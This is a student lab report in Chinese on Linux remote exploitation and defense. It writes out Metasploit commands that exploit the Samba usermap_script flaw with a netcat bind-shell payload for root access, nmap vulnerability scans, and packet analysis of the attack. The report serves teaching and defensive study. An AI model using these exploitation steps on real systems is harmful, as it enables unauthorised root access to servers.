當(dāng)前位置:首頁 > IT技術(shù) > 其他 > 正文

20212813 2021-2022-2 《網(wǎng)絡(luò)攻防實踐》實踐七報告
2022-04-25 22:49:53

一、實踐內(nèi)容

目前,Linux已經(jīng)成為服務(wù)器操作系統(tǒng)最流行的選擇,盡管Linux在安全設(shè)計上較Windows等一些操作系統(tǒng)具有一定的先天優(yōu)勢,但它也決不是早先一些人所認(rèn)為的“絕對安全”。Linux操作系統(tǒng)也存在著大量的安全漏洞,由于它的開源特性,黑客們反而更容易從源碼中發(fā)現(xiàn)更多的Linux 系統(tǒng)內(nèi)核及開源軟件中的漏洞,系統(tǒng)管理員對Linux服務(wù)器的疏于管理也使得近年來針對Linux 系統(tǒng)的安全事件多有發(fā)生。
本次實踐針對Linux系統(tǒng)存在漏洞進行遠(yuǎn)程滲透攻擊,使用的工具為Metasploit,此外在進行攻防對抗過程中,還使用到了Nmap、Neusse等信息搜集工具。

二、實踐過程

(一)使用Metasploit進行Linux遠(yuǎn)程滲透攻擊

任務(wù):使用Metasploit滲透測試軟件,攻擊Linux靶機上的Samba服務(wù)Usermap_script安全漏洞,獲取目標(biāo)Linux靶機的主機訪問權(quán)限。實踐步驟如下:
①啟動Metasploit軟件,可根據(jù)個人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script滲透攻擊模塊;
③選擇攻擊PAYLOAD為遠(yuǎn)程shell,(正向或反向連接均可);
④設(shè)置滲透攻擊參數(shù)(RHOST,LHOST,TARGET等);
⑤執(zhí)行滲透攻擊;
⑥查看是否正確得到遠(yuǎn)程Shell,并查看獲得的權(quán)限。

本次實驗使用的攻擊機為Kali,IP地址為192.168.11.165;靶機為Metasploit Ubuntu,IP地址為192.168.11.149:
首先在Kali上打開Metasploit:

使用search samba搜索關(guān)鍵詞samba尋找合適的滲透模塊,如圖所示,exploit/multi/samba/usermap_script為我們所需要的模塊:

使用命令use exploit/multi/samba/usermap_script加載滲透模塊:

使用show payloads顯示攻擊載荷:

使用set payload cmd/unix/bind_netcat設(shè)置攻擊載荷,然后顯示設(shè)置選項:

設(shè)置攻擊機IP和靶機IP,set RHOST 192.168.11.149;set LHOST 192.168.11.165,然后run進行攻擊,攻擊成功后輸入ifconfig命令查看IP地址,輸入whoami查看當(dāng)前權(quán)限賬戶為root:

(二)實踐作業(yè):攻防對抗實踐

  攻擊方:使用 Metasploit ,選擇 Metasploitable 靶機中發(fā)現(xiàn)的漏洞進行滲透攻擊,獲得遠(yuǎn)程控制權(quán),并嘗試進一步獲得root權(quán)限。
  防守方:使用 tcpdump/wireshark/snort 監(jiān)聽獲得網(wǎng)絡(luò)攻擊的數(shù)據(jù)包文件,結(jié)合 wireshark/snort 分析攻擊過程,獲得攻擊者的IP、目標(biāo)IP和端口、攻擊發(fā)起時間、攻擊利用漏洞、使用Shellcode、以及成功之后在命令行輸入的信息。

1、攻擊方

攻擊方 防守方
Kali Metasploit Ubuntu
192.168.11.165 192.168.11.130

使用nmap -sV 192.168.11.130掃描目標(biāo)主機的開放端口與版本號等信息:

使用nmap --script vuln 192.168.11.130掃描目標(biāo)主機存在的漏洞:

可以看到存在的很多漏洞,比如下面這個CVE-2014-0224OpenSSL SSL MITM漏洞,攻擊者可借助特制的TLS握手利用該漏洞實施中間人攻擊,在OpenSSL-to-OpenSSL通信過程中使用零長度的主密鑰,劫持會話或獲取敏感消息:

攻擊采用的滲透模塊仍然是第一個實驗中使用的模塊,攻擊結(jié)果如圖所示:

2、防守方

攻擊方 防守方
Kali Metasploit Ubuntu
192.168.11.126 192.168.11.149

第一次攻擊

攻擊時抓包結(jié)果如圖所示:

從中可以分析得到,攻擊者IP為192.168.11.126,攻擊端口為139端口。
攻擊的時間大致為25號晚上8點半:

通過追蹤流可以看到使用的shellcode,可以判斷使用的漏洞為Samba服務(wù) usermap_script安全漏洞:

  • nohup:就是no hangup,不要掛斷,忽略hup信號。標(biāo)準(zhǔn)輸出內(nèi)容會輸出到當(dāng)前目錄的nohup.out日志文件中而不終端顯示。
  • 2&>1:linux中的文件號,1是標(biāo)準(zhǔn)輸出流,2是錯誤輸出流,此處&>的意思是合并 標(biāo)準(zhǔn)輸出和錯誤輸出并重定向。

攻擊者攻擊成功后,輸入了以下命令:

ls
whoami
cd etc
ls
mkdir zzx_so_easy
ls

第二次攻擊

攻擊方第二次攻擊捕獲的數(shù)據(jù)包如下:

從中可以分析得到,攻擊者IP為192.168.11.126,攻擊端口為22端口(ssh服務(wù)),因此此次攻擊利用漏洞很可能是SSH相關(guān)漏洞。通過分析可以看到一直在有ssh數(shù)據(jù)包在進行連接登錄,因此推測本次攻擊為SSH弱口令爆破攻擊:

三、學(xué)習(xí)中遇到的問題及解決

  • 問題1:針對usermap_script安全漏洞攻擊的shellcode不太理解
  • 問題1解決方案:通過查閱博客才能大致理解

四、實踐總結(jié)

通過本次使用Metasploit進行Linux遠(yuǎn)程滲透攻擊,首先進一步熟悉了Metasploit工具的使用,其次通過攻防對抗過程,動手進行了從漏洞信息搜集、漏洞利用、滲透攻擊到獲取目標(biāo)主機權(quán)限的過程,提高了自己的實踐能力。

本文摘自 :https://www.cnblogs.com/

開通會員,享受整站包年服務(wù)立即開通 >